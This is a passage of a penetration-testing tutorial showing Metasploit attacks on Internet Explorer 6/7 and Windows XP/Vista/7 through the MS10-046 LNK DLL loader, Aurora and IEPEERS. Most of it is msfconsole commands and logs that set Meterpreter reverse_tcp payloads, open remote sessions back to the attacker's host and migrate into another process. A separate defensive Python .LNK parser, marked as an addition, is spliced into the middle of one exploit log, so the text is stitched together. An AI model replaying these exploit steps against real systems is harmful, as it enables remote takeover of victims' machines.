BASIC CONCEPTS OF PENETRATING MACHINES RUNNING WINDOWS XP/VISTA/7 USING THE METASPLOIT FRAMEWORK - Part II

Shortcut_icon_dllloader IE 6.0, IE 7.0, IE 8.0

This exploit attempts to take advantage of a vulnerability in the way Windows handles shortcuts (.LNK) that contain an icon pointing to a malicious DLL. Running the exploit starts a WebDAV service on the attacker's machine so that an arbitrary payload is executed when the victim tries to access it as a UNC resource.

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4450

LPORT => 4450

msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

Name Current Setting Required Description

----  ---------------  --------  -----------

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 80 yes The daemon port to listen on (do not change)

UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4).

URIPATH / yes The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

----  ---------------  --------  -----------

EXITFUNC process yes Exit technique: seh, thread, none, process

LHOST 192.168.1.34 yes The listen address

LPORT 4450 yes The listen port

Exploit target:

Id Name

--  ----

0 Automatic

msf exploit(ms10_046_shortcut_icon_dllloader) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4450

[*]

[*] Send vulnerable clients to \\192.168.1.34\nXdeLrAW\.

[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk

[*]

[*] Using URL: http://0.0.0.0:80/

[*] Local IP: http://192.168.1.34:80/

[*] Server started.

Once the user connects to the service that Metasploit has started, the attack begins by attempting to open a Meterpreter connection against the target. However, this particular attack can alert the user, because a share with the attacker's remote machine is created automatically and the user can clearly see the shared DLLs in that directory; for this reason, caution is recommended when using it.
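A defensive check for the mechanism described above: a small parser that reads a .LNK file's ShellLinkHeader and StringData and flags an icon location, or any embedded UTF-16 string, that is a UNC path ending in .dll. This is an added example, not code from the original post or from Metasploit; the layout follows the MS-SHLLINK header and StringData format, the two sample shortcuts are constructed inline (reusing the share and DLL names from the log above), and build_sample_lnk, parse_lnk and check_lnk are names chosen here.

```python
import re
import struct

# ShellLinkHeader constants (MS-SHLLINK): HeaderSize 0x4C, CLSID 00021401-0000-0000-C000-000000000046
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_ICON, IS_UNICODE = 0x01, 0x02, 0x40, 0x80
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (HAS_ICON, "icon_location"))
# UTF-16LE "\\host\...\x.dll" anywhere in the file (also covers paths stored inside the IDList)
UNC_DLL_RE = re.compile(rb"\\\x00\\\x00(?:[^\x00]\x00)+?\.\x00[dD]\x00[lL]\x00[lL]\x00")

def parse_lnk(data):
    """Return (LinkFlags, StringData dict) after skipping the optional IDList and LinkInfo."""
    if len(data) < 76 or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.LNK) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:       # IDListSize (uint16) followed by the item ID list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:     # LinkInfoSize (uint32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    strings = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:           # each field: CountCharacters (uint16) + characters, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            raw = data[pos + 2:pos + 2 + width * count]
            strings[name] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += 2 + width * count
    return flags, strings

def check_lnk(data):
    """Heuristic: every UNC path ending in .dll found in the icon location or as an embedded UTF-16 string."""
    _, strings = parse_lnk(data)
    hits = set()
    icon = strings.get("icon_location", "")
    if icon.startswith("\\\\") and icon.lower().endswith(".dll"):
        hits.add(icon)
    for m in UNC_DLL_RE.finditer(data):
        hits.add(m.group().decode("utf-16-le"))
    return sorted(hits)

def build_sample_lnk(icon_location, unicode=True):
    """Constructed test input: a minimal shortcut carrying only an ICON_LOCATION string."""
    flags = HAS_ICON | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags) + bytes(76 - 24)
    body = icon_location.encode("utf-16-le" if unicode else "latin-1")
    return header + struct.pack("<H", len(icon_location)) + body

BENIGN_LNK = build_sample_lnk(r"C:\Windows\System32\shell32.dll")      # local icon resource, common
SUSPECT_LNK = build_sample_lnk(r"\\192.168.1.34\nXdeLrAW\cufAOBP.dll")  # share and DLL names from the log

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("suspect", SUSPECT_LNK)):
        print(label, check_lnk(blob) or "clean")
```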

msf exploit(ms10_046_shortcut_icon_dllloader) >[*] Sending UNC redirect to 192.168.1.36:49381 …

[*] Responding to WebDAV OPTIONS request from 192.168.1.36:49384

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /

[*] Sending directory multistatus for / …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /

[*] Sending directory multistatus for / …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/desktop.ini

[*] Sending 404 for /nXdeLrAW/desktop.ini …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Sending LNK file to 192.168.1.36:49384 …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.manifest …

[*] Sending DLL payload 192.168.1.36:49384 …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.123.Manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.123.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.124.Manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.124.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/cufAOBP.dll.2.Manifest

[*] Sending 404 for /nXdeLrAW/cufAOBP.dll.2.Manifest …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

[*] Sending stage (749056 bytes) to 192.168.1.36

[*] Meterpreter session 3 opened (192.168.1.34:4450 -> 192.168.1.36:49385) at Fri May 13 00:56:37 +0200 2011

[*] Responding to WebDAV OPTIONS request from 192.168.1.36:49384

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW

[*] Sending 301 for /nXdeLrAW …

[*] Received WebDAV PROPFIND request from 192.168.1.36:49384 /nXdeLrAW/

[*] Sending directory multistatus for /nXdeLrAW/ …

AURORA

This exploit takes advantage of the Aurora vulnerability found in IE 6.x and 7.x browsers, which relates to improper use of the memory stack: uninitialized memory positions are accessed, allowing the attacker to inject malicious code at those memory addresses. Like the other exploits described earlier, it starts a Metasploit service that waits for a client to connect with a vulnerable browser before executing the attack.

msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_002_aurora) > set URIPATH /

URIPATH => /

msf exploit(ms10_002_aurora) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_002_aurora) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4444

[*] Using URL: http://0.0.0.0:8080/

[*] Local IP: http://192.168.1.34:8080/

[*] Server started.

msf exploit(ms10_002_aurora) >

[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.38

[*] Sending stage (749056 bytes) to 192.168.1.38

[*] Meterpreter session 1 opened (192.168.1.34:4444 -> 192.168.1.38:1094) at Fri May 13 22:47:19 +0200 2011

sessions

meterpreter>

IEPEERS

This is a vulnerability in the DHTML "behaviors" functionality of Internet Explorer versions 6.x and 7.x. It is known as "IEPEERS" because it is located specifically in the DLL "iepeers.dll"; Microsoft's response was that access to that library had to be restricted, so on IE versions above 7 this exploit no longer works as expected.

msf > use exploit/windows/browser/ms10_018_ie_behaviors

msf exploit(ms10_018_ie_behaviors) > show options

Module options (exploit/windows/browser/ms10_018_ie_behaviors):

Name Current Setting Required Description

----  ---------------  --------  -----------

SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Exploit target:

Id Name

--  ----

0 (Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista

msf exploit(ms10_018_ie_behaviors) > set URIPATH /

URIPATH => /

msf exploit(ms10_018_ie_behaviors) > set SRVPORT 8081

SRVPORT => 8081

msf exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms10_018_ie_behaviors) > set LHOST 192.168.1.34

LHOST => 192.168.1.34

msf exploit(ms10_018_ie_behaviors) > set LPORT 4441

LPORT => 4441

msf exploit(ms10_018_ie_behaviors) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.34:4441

[*] Using URL: http://0.0.0.0:8081/

[*] Local IP: http://192.168.1.34:8081/

[*] Server started.

msf exploit(ms10_018_ie_behaviors) >

[*] Sending Internet Explorer DHTML Behaviors Use After Free to 192.168.1.38:1130 (target: IE 6 SP0-SP2 (onclick))…

[*] Sending stage (749056 bytes) to 192.168.1.38

[*] Meterpreter session 2 opened (192.168.1.34:4441 -> 192.168.1.38:1138) at Fri May 13 23:02:01 +0200 2011

[*] Session ID 2 (192.168.1.34:4441 -> 192.168.1.38:1138) processing InitialAutoRunScript 'migrate -f'

[*] Current server process: IEXPLORE.EXE (1372)

[*] Spawning a notepad.exe host process…

[*] Migrating into process ID 1264

[*] New server process: notepad.exe (1264)